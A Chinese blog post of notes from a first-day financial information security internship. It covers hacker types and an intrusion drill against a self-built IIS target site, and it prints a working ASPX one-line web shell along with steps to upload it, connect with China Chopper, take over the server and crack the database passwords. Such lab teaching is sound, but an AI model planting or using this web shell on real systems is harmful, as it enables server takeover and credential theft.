金融信息安全实习第一天——HK与网络GJ

1.HK的类型

白帽子创新者:设计新系统,打破常规,精研技术,勇于创新 ——追求更好的技术,没有更好,只有最好

灰帽子破解者:破解已有系统,发现问题/漏洞,突破极限/禁制,展现自我——计算机为人民服务

黑帽子破坏者:随意使用资源,恶意破坏,散播蠕虫病毒,商业间谍——人不为己,天诛地灭

(假)脚本小子:完全没有或者仅仅有一点点黑客技巧的人,利用他人所编辑的程序发起网络攻击,但是与真正地黑帽子黑客差距甚远

2.网络攻击的来源

金融信息安全实习第一天——HK与网络GJ

3.网络威胁的形式

金融信息安全实习第一天——HK与网络GJ

4.入侵三部曲

金融信息安全实习第一天——HK与网络GJ

黑客入侵流程演练

1.前期需要现在windows上部署一个IIS web服务

     安装IIS相关环境并利用IIS服务器发布靶站源代码

     

    注意:如果.net环境安装不全可在CMD下输入:

               "%WINDIR%\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" -iru -enable

               如使用64位的windows系统需要应用程序池设置32位应用程序为true。

2.网络探查与端口扫描

准备工具:

端口扫描工具AdvancedPortScanner

局域网探查工具LanSee

3.Web扫描

准备工具:

网站后台扫描工具御剑

网站漏洞扫描工具AWVS

利用target finder功能扫描一个IP地址是否提供web服务,是否开启80、443等端口。

利用web scanner功能扫描一个网站(自己搭建的靶站)

利用site crawler功能爬取网站的文件和目录

4.漏洞利用

过程:

先进行网络后台绕过,然后篡改页面内容

5.上传

一句话木马的使用

1、新建文本文档,将文件后缀修改为aspx,书写内容如下:

<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

2、在系统中寻找文件上传点。

3、上传之前创建的aspx一句话木马文件。

4、设法获得上传文件在网站目录中的文件名称和路径。

5、利用中国菜刀工具连接一句话木马(密码为pass)。

6、获得目标服务器的操作权限并拿到数据库文件。

7、对数据库中的账号密码进行解密。

 

 

 

上一篇:python 全栈 day05 Vim 总结


下一篇:从程序员角度看湖南电信网络全崩,如何防范服务器被***以及解决方案